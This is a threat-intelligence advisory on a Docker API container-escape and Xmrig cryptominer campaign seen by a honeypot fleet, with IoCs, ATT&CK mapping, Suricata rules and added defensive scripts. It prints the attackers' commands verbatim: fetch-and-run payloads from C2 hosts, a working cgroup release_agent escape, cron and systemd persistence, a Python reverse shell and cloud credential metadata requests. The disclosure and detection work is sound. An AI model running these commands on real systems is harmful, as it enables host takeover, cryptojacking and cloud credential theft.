TLP:CLEAR · HIGH · ACTIVE

Docker API Escape + Cryptominer Campaign

Published 2026-06-24 · Source: distributed honeypot fleet · Confidence: HIGH

157K+ commands logged · 30d active window · 7 C2 / distrib IPs · 5 escape techniques

Executive Summary

Over a 30-day window (2026-05-25 through 2026-06-24), sensors observed a sustained campaign targeting exposed Docker APIs. The primary actor (45.198.224.5) generated over 157,000 commands across multiple sensors, employing five distinct container escape techniques — chroot /host, chroot /hostfs, chroot /mnt, cgroup release_agent exploitation, and cron persistence on the host filesystem. The escaped payload downloads and executes a script from 5.182.210.61 via base64-encoded commands, establishing both immediate and recurring persistence.

A second cluster of actors (198.13.47.111, 120.26.46.187, 45.76.202.47, 115.29.236.117, 31.56.48.179) deploys a full Xmrig cryptominer toolchain with config file, scanner binary, cron + systemd persistence, and a Python reverse shell on TCP port 666. Cloud metadata exfiltration (AWS IAM credentials, GCP service account tokens) and VMware/ONVIF infrastructure probing were also observed.

Threat Actor Profile

Attribute           Assessment
---------           ----------
Primary IP          45.198.224.5 — 157,779 Docker commands, 30-day sustained activity
Secondary cluster   5 IPs deploying Xmrig + reverse shell toolchain
Sophistication      High — multiple container escape methods, cgroup exploitation, multi-layer persistence
Intent              Cryptomining (Xmrig), persistent access (reverse shell + cron + systemd), cloud credential theft
First observed      2026-05-25
Last observed       2026-06-24 (active)

Infrastructure Analysis

  ┌─────────────────────────────────────────────────────────────────┐
  │  Docker API exploitation + container escape                     │
  └─────────────────────────────────────────────────────────────────┘

  Attacker 45.198.224.5 ──▶ Docker API (exposed :2375/:2376)
       │
       ├── chroot /host       ──▶ host filesystem
       ├── chroot /hostfs     ──▶ host filesystem (alt mount)
       ├── chroot /mnt        ──▶ mounted volumes
       ├── cgroup release_agent ──▶ kernel-level escape
       └── /host/etc/cron.d/pwn  ──▶ cron persistence on host

       All paths execute:
         base64 → wget -O- http://5.182.210.61/ok | sh
                  || curl -s http://5.182.210.61/ok | sh

  ┌─────────────────────────────────────────────────────────────────┐
  │  Xmrig miner + reverse shell cluster (separate actors)          │
  └─────────────────────────────────────────────────────────────────┘

  198.13.47.111:80    ──▶ .real_mnd (miner), .mconf (config),
  120.26.46.187:80    ──▶ scanner-bin (self-propagation)
  45.76.202.47:80     ──▶ w (cron-persisted wrapper)
  115.29.236.117:80   ──▶ arch-specific: arm64/xmrigMiner, i386/xmrigMiner
  31.56.48.179:80     ──▶
       │
       ├── /tmp/xm (miner binary)
       ├── /tmp/xc (config file)
       ├── /tmp/.s (scanner binary)
       ├── /etc/cron.d/net-check (cron persistence, 1-min interval)
       ├── kernel-audit.service (systemd persistence, auto-restart)
       └── TCP:666 (Python reverse shell, 30s retry loop)
  

C2 / Distribution Infrastructure

IP               Role                   Path / Port   Notes
--               ----                   -----------   -----
5.182.210.61     Payload distribution   /ok           Primary Docker escape payload server
45.205.1.59      Payload distribution   /ok           Secondary payload server (base64 variant)
198.13.47.111    Xmrig C2 + distrib     :80 + :666    Miner, config, scanner, reverse shell
120.26.46.187    Xmrig C2 + distrib     :80 + :666    Same toolchain, adds systemd service
45.76.202.47     Xmrig C2 + distrib     :80 + :666    Same toolchain
115.29.236.117   Xmrig distrib          :80           Arch-adaptive: selects binary by uname -m
31.56.48.179     Xmrig C2 + distrib     :80 + :666    Same toolchain
45.198.224.5     Scanner / exploiter    -             157K+ Docker API commands, 30-day sustained

Container Escape Techniques

1. chroot /host, /hostfs, /mnt

The attacker attempts three filesystem mount paths to reach the host filesystem from within the container. Each variant executes the same base64-encoded payload:

# Direct execution (14,891 times)
echo d2dldCAtTy0gaHR0cDovLzUuMTgyLjIxMC42MS9vayB8IHNoIHx8IG...
    |base64 -d|sh

# chroot /host (14,633 times)
chroot /host sh -c "echo d2dldCAtTy0gaHR0cDovLzUuMTgyLjIxMC42MS9vayB8...
    |base64 -d|sh"

# chroot /hostfs (12,655 times)
chroot /hostfs sh -c "echo d2dldCAtTy0gaHR0cDovLzUuMTgyLjIxMC42MS9vayB8...
    |base64 -d|sh"

# chroot /mnt (12,283 times)
chroot /mnt sh -c 'echo d2dldCAtTy0gaHR0cDovLzUuMTgyLjIxMC42MS9vayB8...
    |base64 -d|sh'

# Decoded payload:
wget -O- http://5.182.210.61/ok | sh || curl -s http://5.182.210.61/ok | sh

2. cgroup release_agent Escape

A kernel-level container escape abusing the cgroup v1 release_agent mechanism, which is only reachable from a container with a writable cgroup hierarchy (typically one started with --privileged). The script locates a cgroup subsystem that exposes release_agent, creates an empty child cgroup with notify_on_release set, writes the payload to /cmd inside the container, recovers the container's overlay upperdir from /etc/mtab so the same file can be named by a host-side path, registers that host path as the release agent, then moves a short-lived shell into the child cgroup; when that shell exits the cgroup empties and the kernel runs /cmd on the host:

d=$(dirname $(ls -x /s*/fs/c*/*/r* 2>/dev/null | head -n1))
[ -z "$d" ] && exit 1
mkdir -p $d/w
echo 1 > $d/w/notify_on_release
hp=$(sed -n 's/.*\bperdir=\([^,]*\).*/\1/p' /etc/mtab)
printf '#!/bin/sh\n%s\n' "wget -O- http://5.182.210.61/ok|sh||curl -s http://5.182.210.61/ok|sh" > /cmd
chmod +x /cmd
echo "$hp/cmd" > $d/release_agent
sh -c "echo \$\$ > $d/w/cgroup.procs"
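Techniques 1 and 2 both depend on how the container was created: the chroot variants need the host filesystem bind-mounted at /host, /hostfs or /mnt, and the release_agent write needs a writable cgroup hierarchy plus CAP_SYS_ADMIN, which --privileged supplies. The following is an added example, not code from the report, that evaluates `docker inspect` output for those preconditions (HostConfig.Privileged, HostConfig.CapAdd, HostConfig.SecurityOpt and Mounts are real fields of that output; the Docker-socket check is a general hardening check that goes beyond the techniques observed here). The sample inspect documents are constructed for illustration.

```python
"""Flag container settings that make the chroot /host and cgroup
release_agent escapes described above possible.

Added example, not part of the original report. Input is the JSON list
that `docker inspect <container>` prints; SAMPLE_INSPECT_JSON is constructed.
"""
import json

# Mount points the campaign chroots into (from the report).
HOST_CHROOT_TARGETS = {"/host", "/hostfs", "/mnt"}


def assess_container(doc: dict) -> list[str]:
    """Return human-readable findings for one inspect document; empty means no finding."""
    findings = []
    host_cfg = doc.get("HostConfig") or {}

    # Technique 2 precondition: a writable cgroup hierarchy (which --privileged
    # exposes) and CAP_SYS_ADMIN. --privileged grants every capability.
    if host_cfg.get("Privileged"):
        findings.append("privileged container: writable cgroupfs, release_agent escape possible")
    caps = {c.upper().removeprefix("CAP_") for c in (host_cfg.get("CapAdd") or [])}
    if caps & {"SYS_ADMIN", "ALL"}:
        findings.append("CAP_SYS_ADMIN added: can mount cgroupfs and write release_agent")
    for opt in host_cfg.get("SecurityOpt") or []:
        if opt in ("apparmor=unconfined", "seccomp=unconfined"):
            findings.append(f"{opt}: kernel-side confinement of the container disabled")

    # Technique 1 precondition: the host filesystem reachable through a bind mount.
    for m in doc.get("Mounts") or []:
        if m.get("Type") != "bind":
            continue
        src, dst = m.get("Source", ""), m.get("Destination", "")
        mode = "rw" if m.get("RW", True) else "ro"
        if src == "/":
            findings.append(f"host root bind-mounted at {dst} ({mode}): chroot {dst} reaches the host")
        elif dst in HOST_CHROOT_TARGETS:
            findings.append(f"bind mount {src} -> {dst} matches a chroot target used by the campaign")
        elif src in ("/var/run/docker.sock", "/run/docker.sock"):
            # General hardening check (assumption: not among the techniques observed here).
            findings.append(f"Docker socket mounted at {dst}: full control of the host daemon")
    return findings


def assess_inspect_output(text: str) -> dict[str, list[str]]:
    """Parse `docker inspect` output (a JSON list) and assess every container in it."""
    return {
        (d.get("Name") or d.get("Id") or "?").lstrip("/"): assess_container(d)
        for d in json.loads(text)
    }


# Constructed inspect documents: one matching the campaign's preconditions,
# one with only CAP_SYS_ADMIN added, one hardened.
SAMPLE_INSPECT_JSON = json.dumps([
    {"Name": "/risky",
     "HostConfig": {"Privileged": True, "CapAdd": None, "SecurityOpt": None},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host", "RW": True}]},
    {"Name": "/capadd",
     "HostConfig": {"Privileged": False, "CapAdd": ["CAP_SYS_ADMIN"]},
     "Mounts": []},
    {"Name": "/safe",
     "HostConfig": {"Privileged": False, "CapAdd": None, "CapDrop": ["ALL"],
                    "SecurityOpt": ["no-new-privileges"]},
     "Mounts": [{"Type": "volume", "Source": "appdata", "Destination": "/data", "RW": True}]},
])

if __name__ == "__main__":
    for name, findings in assess_inspect_output(SAMPLE_INSPECT_JSON).items():
        print(name, findings or ["no findings"])
```

Run it against `docker inspect $(docker ps -q)` to sweep every running container on a host; any container that reports both a host-root bind mount and a privileged or CAP_SYS_ADMIN finding is exposed to the full set of techniques in this report.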

3. Cron Persistence on Host

# Write to host's cron directory (498 times)
printf '%s\n' "* * * * * root wget -O- http://5.182.210.61/ok|sh||curl -s http://5.182.210.61/ok|sh" \
  > /host/etc/cron.d/pwn
chmod 644 /host/etc/cron.d/pwn

4. Loop Persistence (nohup + chroot)

# Decoded: while true;do wget -O- http://5.182.210.61/ok|sh||curl -s http://5.182.210.61/ok|sh;sleep 300;done
chroot /host sh -c "while true;do wget -O- http://5.182.210.61/ok|sh||curl -s http://5.182.210.61/ok|sh;sleep 300;done"

5. Additional variants

The attacker also uses eval $(echo ... | base64 -d), busybox sh -c, nohup ... >/dev/null 2>&1 &, and writes scripts to /host/p.sh and /mnt/p.sh with chmod 777 — maximizing the chance of successful execution across heterogeneous Docker configurations.
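The variants above all wrap the same payload differently, so a sensor that only string-matches the raw command sees five or more unrelated events. The following is an added example, not code from the report or the honeypot, of an analyser that strips the `echo <b64>|base64 -d` and `eval $(echo <b64>|base64 -d)` wrappers, pulls out download URLs, and labels which of the techniques in this section a command attempts (the labels reuse ATT&CK IDs from the mapping later in this report). SAMPLE_LOG is constructed to mirror the commands shown above; it is not raw sensor output.

```python
"""Decode and classify Docker API commands captured by the honeypot.

Added example, not part of the original report. SAMPLE_LOG is constructed.
"""
import base64
import binascii
import re
from collections import Counter

# `echo <base64> | base64 -d`, with or without quotes around the blob.
B64_WRAPPER = re.compile(r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+-d")
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?[\w./\-]*")

# Technique labels and the pattern that evidences each one.
TECHNIQUE_PATTERNS = [
    ("T1611 chroot into host mount (/host, /hostfs, /mnt)", re.compile(r"chroot\s+/(host|hostfs|mnt)\b")),
    ("T1611 cgroup release_agent escape", re.compile(r"notify_on_release|release_agent")),
    ("T1053.003 cron file written on host mount", re.compile(r"/host/etc/cron\.d/")),
    ("loop persistence (while true ... sleep)", re.compile(r"while\s+true.*\bsleep\b", re.S)),
    ("script dropped on host mount (p.sh)", re.compile(r"/(host|mnt)/p\.sh")),
]


def decode_layers(cmd: str, max_depth: int = 3) -> list[str]:
    """Return the command followed by each successive base64-decoded layer."""
    layers = [cmd]
    for _ in range(max_depth):
        m = B64_WRAPPER.search(layers[-1])
        if not m:
            break
        try:
            decoded = base64.b64decode(m.group(1), validate=True)
        except (binascii.Error, ValueError):
            break  # truncated or corrupted blob: keep what we have
        layers.append(decoded.decode("utf-8", "replace"))
    return layers


def classify(cmd: str) -> dict:
    """Classify one captured command: number of layers, URLs, technique labels."""
    layers = decode_layers(cmd)
    text = "\n".join(layers)
    return {
        "layers": len(layers),
        "urls": sorted(set(URL_RE.findall(text))),
        "techniques": [label for label, pat in TECHNIQUE_PATTERNS if pat.search(text)],
    }


def summarize(log: list[str]) -> Counter:
    """Count technique labels across a batch of captured commands."""
    counts = Counter()
    for cmd in log:
        counts.update(classify(cmd)["techniques"])
    return counts


# Constructed samples mirroring the report's decoded payload and wrappers.
PAYLOAD = "wget -O- http://5.182.210.61/ok | sh || curl -s http://5.182.210.61/ok | sh"
PAYLOAD_B64 = base64.b64encode(PAYLOAD.encode()).decode()
SAMPLE_LOG = [
    f"echo {PAYLOAD_B64}|base64 -d|sh",
    f'chroot /host sh -c "echo {PAYLOAD_B64}|base64 -d|sh"',
    f"chroot /hostfs sh -c 'eval $(echo {PAYLOAD_B64} | base64 -d)'",
    "mkdir -p /sys/fs/cgroup/x/w; echo 1 > /sys/fs/cgroup/x/w/notify_on_release; "
    'echo "$hp/cmd" > /sys/fs/cgroup/x/release_agent',
    "printf '%s\\n' '* * * * * root wget -O- http://5.182.210.61/ok|sh' > /host/etc/cron.d/pwn",
    'chroot /mnt sh -c "while true;do wget -O- http://5.182.210.61/ok|sh;sleep 300;done"',
]

if __name__ == "__main__":
    for cmd in SAMPLE_LOG:
        print(classify(cmd))
    print(summarize(SAMPLE_LOG))
```

Feeding the full 157K-command capture through summarize() gives the per-technique counts quoted in this section directly from the decoded text rather than from the raw wrapper strings, and the URL set is what to diff against the IoC list as the campaign rotates payload servers.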

Xmrig Cryptominer Deployment Chain

A separate cluster of IPs deploys a full Xmrig toolchain via the Docker API. Representative payload from 198.13.47.111:

# 1. Download miner + config + scanner (multi-method fallback)
curl -sLo /tmp/xm http://198.13.47.111:80/.real_mnd
wget -q -O /tmp/xm http://198.13.47.111:80/.real_mnd
curl -sLo /tmp/xc http://198.13.47.111:80/.mconf
wget -q -O /tmp/xc http://198.13.47.111:80/.mconf

# 2. Launch miner
chmod +x /tmp/xm
/tmp/xm -c /tmp/xc >/dev/null 2>&1 &

# 3. Launch scanner (self-propagation)
curl -sLo /tmp/.s http://198.13.47.111:80/scanner-bin
chmod +x /tmp/.s
/tmp/.s >/dev/null 2>&1 &

# 4. Cron persistence (1-minute interval)
echo '*/1 * * * * root (curl -sLo /tmp/.w http://198.13.47.111:80/w)&&sh /tmp/.w' \
  > /etc/cron.d/net-check

# 5. Systemd persistence (auto-restart)
cat > /etc/systemd/system/kernel-audit.service << 'UNIT'
[Unit]
Description=Kernel Audit
After=network.target
[Service]
Type=simple
ExecStart=/bin/sh -c "(curl -sLo /tmp/.w http://120.26.46.187:80/w)&&sh /tmp/.w"
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
UNIT
systemctl daemon-reload
systemctl enable --now kernel-audit.service

# 6. Python reverse shell (TCP:666, 30s retry)
while true; do
  python3 -c "import socket,subprocess,os; s=socket.socket(); s.settimeout(30); \
    s.connect(('198.13.47.111',666)); os.dup2(s.fileno(),0); \
    os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); \
    subprocess.call(['/bin/sh','-i'])" 2>/dev/null
  sleep 30
done
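The chain above leaves a fixed set of host-side traces (the cron entry, the systemd unit, the /tmp binaries and wrapper), which the Indicators of Compromise section later in this report lists. The following is an added example, not code from the report, that triages a host for those artifacts: it checks the known paths, then reads every file in /etc/cron.d and /etc/systemd/system for references to the C2 addresses or for the generic "fetch a script into /tmp and run it" shape, so a renamed copy of the same persistence is still caught. The `root` argument lets it run over a mounted disk image or a /host bind mount; build_sample_tree() writes a constructed tree into a temporary directory (the 203.0.113.5 address in it is a TEST-NET placeholder, not an observed IP) and never touches the real /etc or /tmp.

```python
"""Triage a host for the persistence artifacts the Xmrig chain leaves behind.

Added example, not part of the original report. Paths and C2 addresses
are the ones listed in the report; the sample tree is constructed.
"""
import os
import re
import tempfile

# Paths named in the report (relative to the host root).
ARTIFACT_PATHS = [
    "etc/cron.d/net-check",
    "etc/systemd/system/kernel-audit.service",
    "tmp/xm", "tmp/xc", "tmp/.s", "tmp/.w",
]
C2_IPS = {
    "5.182.210.61", "45.205.1.59", "198.13.47.111", "120.26.46.187",
    "45.76.202.47", "115.29.236.117", "31.56.48.179",
}
# Generic form of the campaign's cron/systemd line: fetch a script into /tmp, then run it.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b[^\n]*?/tmp/\.?\w+[^\n]*?\bsh\s+/tmp/")


def scan_host(root: str = "/") -> list[dict]:
    """Return {"path", "reason"} findings for known artifact paths and for
    cron.d / systemd unit files that reference the C2 set or match the
    fetch-and-run pattern."""
    findings = []
    for rel in ARTIFACT_PATHS:
        path = os.path.join(root, rel)
        if os.path.lexists(path):
            findings.append({"path": path, "reason": "known artifact path"})

    for rel_dir in ("etc/cron.d", "etc/systemd/system"):
        directory = os.path.join(root, rel_dir)
        if not os.path.isdir(directory):
            continue
        for name in sorted(os.listdir(directory)):
            path = os.path.join(directory, name)
            if not os.path.isfile(path):
                continue
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            hits = sorted(ip for ip in C2_IPS if ip in text)
            if hits:
                findings.append({"path": path, "reason": "references C2 " + ", ".join(hits)})
            elif FETCH_AND_RUN.search(text):
                findings.append({"path": path, "reason": "fetches and runs a script from /tmp"})
    return findings


def build_sample_tree(base: str) -> str:
    """Populate `base` with a constructed tree that mimics an infected host."""
    files = {
        "etc/cron.d/net-check":
            "*/1 * * * * root (curl -sLo /tmp/.w http://198.13.47.111:80/w)&&sh /tmp/.w\n",
        # Renamed copy pointing at a constructed TEST-NET address (not an observed IoC).
        "etc/cron.d/sys-health":
            "*/1 * * * * root (wget -qO /tmp/.h http://203.0.113.5/h)&&sh /tmp/.h\n",
        # Benign control entry that must not be flagged.
        "etc/cron.d/logrotate":
            "0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n",
        "etc/systemd/system/kernel-audit.service":
            "[Service]\nExecStart=/bin/sh -c \"(curl -sLo /tmp/.w http://120.26.46.187:80/w)&&sh /tmp/.w\"\n",
        "tmp/xm": "",
    }
    for rel, content in files.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return base


def run_demo() -> list[dict]:
    """Build the sample tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_host(build_sample_tree(tmp))


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['path']}: {f['reason']}")
```

On a live system call scan_host() with no argument; from inside a forensic container with the suspect disk mounted read-only, pass the mount point as `root`.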

Cloud Metadata Exfiltration

# AWS IMDSv1 (no token required)
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/info

# GCP metadata (requires Metadata-Flavor: header — attacker likely adds it)
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

Infrastructure Probing

The attacker also probes for VMware vSphere SOAP APIs and ONVIF device management:

# VMware vSphere ServiceInstance discovery
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <RetrieveServiceContent xmlns="urn:internalvim25">
      <_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
    </RetrieveServiceContent>
  </soap:Body>
</soap:Envelope>

# ONVIF device info
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:tds="http://www.onvif.org/ver10/device/wsdl">
  <s:Body><tds:GetDeviceInformation/></s:Body>
</s:Envelope>

MITRE ATT&CK Mapping

ID          Technique                      Evidence
--          ---------                      --------
T1611       Escape to Host                 chroot /host, /hostfs, /mnt; cgroup release_agent
T1053.003   Cron                           /etc/cron.d/net-check, /host/etc/cron.d/pwn
T1543.002   Systemd Service                kernel-audit.service with auto-restart
T1496       Resource Hijacking             Xmrig miner deployment with config file
T1552.005   Cloud Instance Metadata API    AWS IMDS + GCP metadata endpoint probing
T1105       Ingress Tool Transfer          wget/curl/python urllib downloads from C2
T1071.001   Web Protocols (C2)             HTTP downloads from 5 C2 IPs; Python reverse shell on TCP:666
T1059.006   Python                         Python reverse shell with socket/subprocess

Campaign Timeline

Date         Event
----         -----
2026-05-25   First Docker escape commands observed. 45.198.224.5 begins sustained 30-day campaign.
2026-05-25   Xmrig cluster (198.13.47.111, 120.26.46.187) begins miner deployment.
2026-05-27   VMware SOAP + ONVIF probing observed alongside Docker exploits.
2026-06-05   Xmrig cluster adds 115.29.236.117 with arch-adaptive binary selection.
2026-06-24   Campaign still active. 45.198.224.5 continues generating commands.

Indicators of Compromise

Network — IPs

45.198.224.5 — primary Docker API scanner/exploiter
5.182.210.61 — payload distribution (Docker escape)
45.205.1.59 — secondary payload distribution
198.13.47.111 — Xmrig C2 + distrib + reverse shell (:666)
120.26.46.187 — Xmrig C2 + distrib + systemd persistence
45.76.202.47 — Xmrig C2 + distrib
115.29.236.117 — Xmrig distrib (arch-adaptive)
31.56.48.179 — Xmrig C2 + distrib

Network — URLs

http://5.182.210.61/ok
http://45.205.1.59/ok
http://198.13.47.111:80/.real_mnd
http://198.13.47.111:80/.mconf
http://198.13.47.111:80/scanner-bin
http://198.13.47.111:80/w
http://120.26.46.187:80/.real_mnd
http://120.26.46.187:80/.mconf

Host — Persistence Artifacts

/etc/cron.d/net-check — cron entry (1-min interval, Xmrig wrapper)
/host/etc/cron.d/pwn — cron entry on host (1-min interval)
/etc/systemd/system/kernel-audit.service — systemd unit (auto-restart, Xmrig wrapper)
/tmp/xm, /tmp/xc, /tmp/.s, /tmp/.w — miner, config, scanner, wrapper

Network — C2 Port

TCP:666 — Python reverse shell (30s retry loop)

Cloud Metadata Endpoints Probed

http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/info
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

Detection Signatures

Suricata — Docker API Base64 Payload

alert http $EXTERNAL_NET any -> $HOME_NET any (
  msg:"cowrAI Docker API base64-encoded payload injection";
  flow:to_server,established;
  http.request_body; content:"d2dldCAt"; 
  content:"base64"; distance:0;
  content:"chroot"; nocase;
  threshold:type both, track by_src, count 3, seconds 60;
  classtype:trojan-activity; sid:9003010001; rev:1;
)
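The content match "d2dldCAt" is the base64 encoding of "wget -" only when that text sits at a 3-byte boundary of the encoded blob; if the same plaintext is encoded with one or two bytes in front of it, the character sequence differs and this rule does not fire. The following is an added example, not part of the report or of any published ruleset, that derives all three alignments of a plaintext fragment (the same idea as YARA's `base64` string modifier) so each can be placed in its own rule; the fragment is taken from the decoded payload above and the self-check embeds it at every offset to confirm the variants match.

```python
"""Derive every base64 alignment of a plaintext fragment so a content
match does not depend on where the fragment falls in the encoded blob.

Added example, not part of the original report. FRAGMENT comes from the
decoded payload in the report.
"""
import base64


def base64_alignments(fragment: bytes) -> list[str]:
    """Return the three encoded substrings that match `fragment` when it
    starts at byte offset 0, 1 or 2 (mod 3) inside a larger base64 blob."""
    variants = []
    for shift in range(3):
        padded = b"\x00" * shift + fragment  # placeholder bytes before the fragment
        enc = base64.b64encode(padded).decode().rstrip("=")
        # Leading characters that mix in bits of the unknown preceding bytes:
        # 0 for offset 0, 2 for offset 1, 3 for offset 2.
        start = (0, 2, 3)[shift]
        # If the fragment ends mid-group, the final character also encodes
        # bits of whatever byte follows it, so drop that character too.
        end = len(enc) - (1 if len(padded) % 3 else 0)
        variants.append(enc[start:end])
    return variants


def verify_alignments(fragment: bytes, context: bytes = b"XYZ") -> bool:
    """Self-check: embed the fragment after 0, 1 and 2 context bytes, encode
    the whole blob, and confirm the variant for that offset is found in it."""
    variants = base64_alignments(fragment)
    return all(
        variants[shift] in base64.b64encode(context[:shift] + fragment + context).decode()
        for shift in range(3)
    )


def suricata_contents(fragment: bytes) -> list[str]:
    """Render one content keyword per alignment, for use in three sibling rules."""
    return [f'content:"{v}";' for v in base64_alignments(fragment)]


FRAGMENT = b"wget -O- http://5.182.210.61/ok"  # start of the decoded payload in the report

if __name__ == "__main__":
    for keyword in suricata_contents(FRAGMENT):
        print(keyword)
    print("self-check:", verify_alignments(FRAGMENT))
```

Suricata has no OR between content keywords inside one rule, so the three variants go into three rules (or one `pcre` alternation); the first variant reproduces the "d2dldCAt" prefix already used above.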

Suricata — cgroup release_agent Escape

alert http $EXTERNAL_NET any -> $HOME_NET any (
  msg:"cowrAI Docker cgroup release_agent container escape";
  flow:to_server,established;
  http.request_body; content:"notify_on_release";
  content:"release_agent"; distance:0;
  content:"cgroup.procs"; distance:0;
  classtype:trojan-activity; sid:9003010002; rev:1;
)

Suricata — Xmrig C2 Beacon (TCP:666)

alert tcp $HOME_NET any -> $EXTERNAL_NET 666 (
  msg:"cowrAI Docker Xmrig reverse shell C2 beacon";
  flow:to_server,established;
  dsize:<200;
  threshold:type both, track by_src, count 5, seconds 150;
  classtype:trojan-activity; sid:9003010003; rev:1;
)

Suricata — Cloud Metadata Exfiltration

alert http $HOME_NET any -> $EXTERNAL_NET any (
  msg:"cowrAI Cloud metadata exfiltration from container";
  flow:to_server,established;
  http.host; content:"169.254.169.254";
  http.uri; content:"/iam/security-credentials/";
  classtype:trojan-activity; sid:9003010004; rev:1;
)

alert http $HOME_NET any -> $EXTERNAL_NET any (
  msg:"cowrAI GCP metadata exfiltration from container";
  flow:to_server,established;
  http.host; content:"metadata.google.internal";
  http.uri; content:"/service-accounts/default/token";
  classtype:trojan-activity; sid:9003010005; rev:1;
)

Collection Methodology

Data collected by a distributed honeypot fleet running custom protocol lures that emulate exposed Docker APIs. All commands were captured at the application layer and ingested into a time-series database for analysis. The lures emulate a Docker API endpoint accepting container management commands; attacker commands are logged verbatim including base64-encoded payloads, which were decoded offline for this report.